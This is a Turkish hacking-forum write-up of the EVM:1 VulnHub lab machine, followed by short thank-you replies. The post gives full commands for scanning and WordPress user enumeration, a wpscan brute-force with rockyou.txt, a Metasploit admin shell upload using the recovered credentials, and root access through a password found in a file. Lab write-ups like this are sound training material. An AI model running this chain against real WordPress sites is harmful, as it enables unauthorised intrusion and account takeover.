EVM:1 Zafiyetli Makinesinin Çözümü//"P4RS

P4RS · 9 Ara 2019

Merhabalar TürkHackTeam ailesi, bugün sizlere EVM:1 VulnHub Zafiyetli Makinesinin çözümünü göstereceğim.

https://www.vulnhub.com/entry/evm-1,391/

Makine İsmi: EVM: 1

Yayınlanma Tarihi: 2 Kasım 2019

Yapımcı: Ic0de

Seri: EVM

Açıklama: Hedefte ki Flag.txt dosyasını bulmak ve root olmak

Dosya Boyutu: 780 MB

İşletim Sistemi: Linux

Zorluk Derecesi: Orta

Öncelikle hedefin IP adresini öğrenmek için netdiscover aracını kullanıyoruz. Terminale

Kod:

sudo netdiscover

yazalım.

IP adresini yakaladık.

Ardından NMAP taraması yaparak açık portlar hakkında bilgi toplayacağız. Terminale

Kod:

nmap -A 192.168.1.16

yazalım ve açık portlara bakalım. SSH ve 80 portu açık yani bir site var.

Siteye gidelim ve içeriğe bakalım. İçerikten pek de bir şey çıkmadı sadece mesaj olarak /wordpress vermişler.

Siteyi kazımak için dirb aracını kullanıyoruz. Terminale

Kod:

dirb http://192.168.1.16/

yazdık ve tamaya başladı. /wordpress dizinini buldu bizlere.

Siteyi açtım ve URL sonuna /wordpress ekledim. Bu şekilde bir arayüz karşıladı beni.

Wpscan ile daha fazla wordpress dizini ile ilgili bilgi toplayacağız. Terminale

Kod:

wpscan --url http://192.168.1.16/wordpress/ -e at -e ap -e u

yazarak taramayı başlatıyoruz. (ap : Tüm eklentileri
at : Tüm temaları
u : Oturum açmış bütün kullanıcıları listeler.)

Gördüğünüz gibi c0rrupt3d_brain isimli bir kullanıcıyı yakaladı.

Şimdi bu kullanıcı için kaba kuvvet saldırısı yapacağız bunun için de rockyou.txt dosyasını kullanacağız. Terminale

Kod:

wpscan --url http://192.168.1.16/wordpress/  -U c0rrupt3d_brain -P rockyou.txt dosya yolu

yazıyoruz.

Tarama sonucu şifremizi buluyor şifre: 24992499 olarak bulduk.

Exploit zamanı

Terminale

Kod:

msfconsole

yazalım.

Kod:

search webapp

yazalım bizlere siteye ilk girdiğimizde ipucu vermişti zaten.

Burada exploit/unix/webapp/wp_admin_shell_upload exploitini kullanacağız.

Direk kullanmak için

Kod:

use 105

yazdım çünkü baş tarafından 105 id'si vardı. Ayarlarına bakmak için

Kod:

show options

yazalım.

Ayarları yapmak için

Kod:

set RHOSTS 192.168.1.16
set TARGETURU /wordpress
set USERNAME c0rrupt3d_brain
set PASSWORD 24992499
exploit

yazalım.
Ve içerideyiz.

home dizinine gitmek içni

Kod:

cd /home

ve içeride ki bilgileri görmek için

Kod:

ls

yazdık. İçeride root3r dizinini gördük ve içeri girmek için

Kod:

cd root3r

ve bilgileri yazdırmak için

Kod:

ls

yazdık. İçeride ssh bağlantısının şifresi yazan bir dosya bulduk.

Bunu

Kod:

cat .root_password_ssh.txt

ile yazdırdığımda da şifreyi yani willy26 olduğunu öğrendik.

Şimdi yetki yükseltme işlemi yapacağız. İlk olarak

Kod:

shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

yazarak yetki yükselttik. Şimdi

Kod:

 su root

şifreye de willy26 yazalım. Ardından

Kod:

cd /root
ls
cat proof.txt

yazarak işlemi bitirelim

[ame="https://www.youtube.com/watch?v=rfbr6uLQJRk"]https://www.youtube.com/watch?v=rfbr6uLQJRk[/ame]

Konum bu kadardı arkadaşlar, başka bir konumda görüşmek üzere sağlıcakla..

Eronmay · 9 Ara 2019

Elinize Sağlık Pars Bey

)

GZM16 · 9 Ara 2019

Eline Sağlık.

x4807 · 9 Ara 2019

Hocam güzel konu olmuş özellikle siber güvenlik klübü için bir ön bilgilendirme denebilir

Ellerinize sağlık

P4RS · 9 Ara 2019

Eronmay' Alıntı:
Elinize Sağlık Pars Bey )

GZM16' Alıntı:
Eline Sağlık.

Noah Parker' Alıntı:
Hocam güzel konu olmuş özellikle siber güvenlik klübü için bir ön bilgilendirme denebilir Ellerinize sağlık

Beğenmenize sevindim arkadaşlar

)

PourLa · 9 Ara 2019

Ellerin dert görmesin

By Ghost · 9 Ara 2019

Elinize sağlık hocam güzel bir anlatım olmuş Wordpress panel üzerinden de reverse shell yöntemi ile içeri sızabiliriz diye tahmin ediyorum. Yapılan işlem aynı oluyor ama söylemek istedim

P4RS · 21 Ara 2019

Videolu çözümü eklenmiştir.

EVM:1 Zafiyetli Makinesinin Çözümü//"P4RS

P4RS

Özel Üye

Eronmay

Özel Üye

GZM16

Katılımcı Üye

x4807

Katılımcı Üye

P4RS

Özel Üye

PourLa

Uzman üye

By Ghost

Katılımcı Üye

P4RS

Özel Üye

Sosyal medya sayfalarımız